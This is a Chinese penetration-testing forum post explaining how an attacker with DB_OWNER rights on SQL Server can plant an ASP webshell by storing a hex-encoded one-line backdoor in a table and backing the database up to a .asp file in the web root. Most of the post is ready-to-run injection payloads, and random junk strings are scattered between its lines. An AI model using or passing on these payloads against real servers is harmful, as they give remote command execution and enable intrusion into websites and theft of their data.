中国网络渗透测试联盟
标题:
DB_OWNER权限得到webshell的改进方法
[打印本页]
作者:
admin
时间:
2012-12-31 09:57
标题:
DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少
" M7 f* y6 I T: S1 P. X& y: M
2 S- q, _) w, h! m, f. i* R4 `
一利用差异备份
. S/ a) u# J* s l) f
加一个参数WITH DIFFERENTIAL
. i" f& b7 o) N( h
" L1 v! h5 {5 q6 l
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
; z; H4 o; ]4 { C6 k+ G. ~
create table [dbo].[xiaolu] ([cmd] [image]);
) @9 b* c' c5 ?# ?# Q, w8 m
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
8 Q6 o: J- V; y( {/ _
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
5 y& P" ?) M& K7 d% m. B$ f9 o+ f
7 e+ a$ V( q/ Z5 H
二利用完全FORMAT
' q1 g! m3 N0 |$ Z8 i+ Q
加一个参数WITH FROMAT
; T% ]' R0 N7 e- L. ?
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
, A2 H! B9 Y% w0 j# k' }
0 E4 c* T) l4 x4 Q
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
7 C5 Z1 l+ f; L( @% T
create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
3 _' R6 S( g8 H/ c5 @
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
6 ]4 Z9 U' p* Y! U, m& [& w
/ p4 |2 [- L7 W, h1 p2 w+ [6 q T6 a2 }
总的来说就是那么简单几句,下面以备份数据库model为例子
8 V& @- R3 Y. X5 ?' z9 j6 S
6 W6 A3 E4 _9 ?5 B4 m
id=1;use model create table cmd(str image);insert into cmd(str) values (”)
/ J, `% L+ Z1 S6 m* V: T% h/ _
! Y5 P3 m8 e/ a( `) _6 `4 m
id=1;backup database model to disk=’你的路径‘ with differential,format;–
! p- ~8 G1 B3 O# e
3 y- g! s( Q! X# ?
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2